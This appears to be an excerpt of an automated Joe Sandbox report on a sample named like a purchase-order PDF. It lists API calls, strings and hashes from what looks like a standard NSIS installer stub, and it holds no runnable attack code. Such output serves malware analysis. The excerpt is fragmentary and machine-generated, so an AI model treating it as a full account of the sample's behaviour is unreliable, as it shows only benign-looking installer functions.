                                                                                                            • API String ID: 2624150263-3554254475
                                                                                                            • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                            • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                            • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                            • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                              • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                              • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            • soft, xrefs: 00402EDC
                                                                                                            • Inst, xrefs: 00402ED3
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                            • Null, xrefs: 00402EE5
                                                                                                            • Error launching installer, xrefs: 00402E3E
                                                                                                            • (*B, xrefs: 00402E7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                            • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 4283519449-2478819026
                                                                                                            • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                            • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                            • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                            • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                            • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                            • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                            • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                            Strings
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-730719616
                                                                                                            • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                            • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                            • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                            • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$wsprintf
                                                                                                            • String ID: jA$ jA$... %d%%
                                                                                                            • API String ID: 551687249-2167919867
                                                                                                            • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                            • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                            • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                            • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                            • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                            • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                            • GetSysColor.USER32(?), ref: 004041E4
                                                                                                            • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                            • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                            • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                            • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                              • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                            • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                            • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                            • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                            • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                            • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                            • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                            • GetMessagePos.USER32 ref: 00404AA1
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                            • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                            • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                            • MulDiv.KERNEL32(?,00000064,?), ref: 00402D4D
                                                                                                            • wsprintfW.USER32 ref: 00402D5D
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                            Strings
                                                                                                            • verifying installer: %d%%, xrefs: 00402D57
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-82062127
                                                                                                            • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                            • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                            • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                            • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                            • Opcode Fuzzy Hash: 9adbd91855f61e1aa42084a324919f92679eaa0def369839d701c2d0f369fcba
                                                                                                            • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                            • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                            • CharNextW.USER32(0040A300,0043F000,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                            • CharPrevW.USER32(0040A300,0040A300,74DF3420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                            • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                            • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                            • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017A8
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017CD
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                              • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                              • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,74DF23A0), ref: 0040520F
                                                                                                              • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                              • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                            • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                            • Opcode Fuzzy Hash: 76a6acc1869b1502df51b2d70689f923f1781407bbca0b7b9e67ba73967ab9b8
                                                                                                            • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1912718029-0
                                                                                                            • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                            • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                            • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                            • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                            • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                            • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401D59
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                            • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2918273234.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2918258819.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918288853.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918305133.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2918328200.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
                                                                                                            • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                            • Opcode Fuzzy Hash: f8a4d83ee30cd42d14a6a9659d47529e4ebc45f269bacdb6346c82beb54ce81b
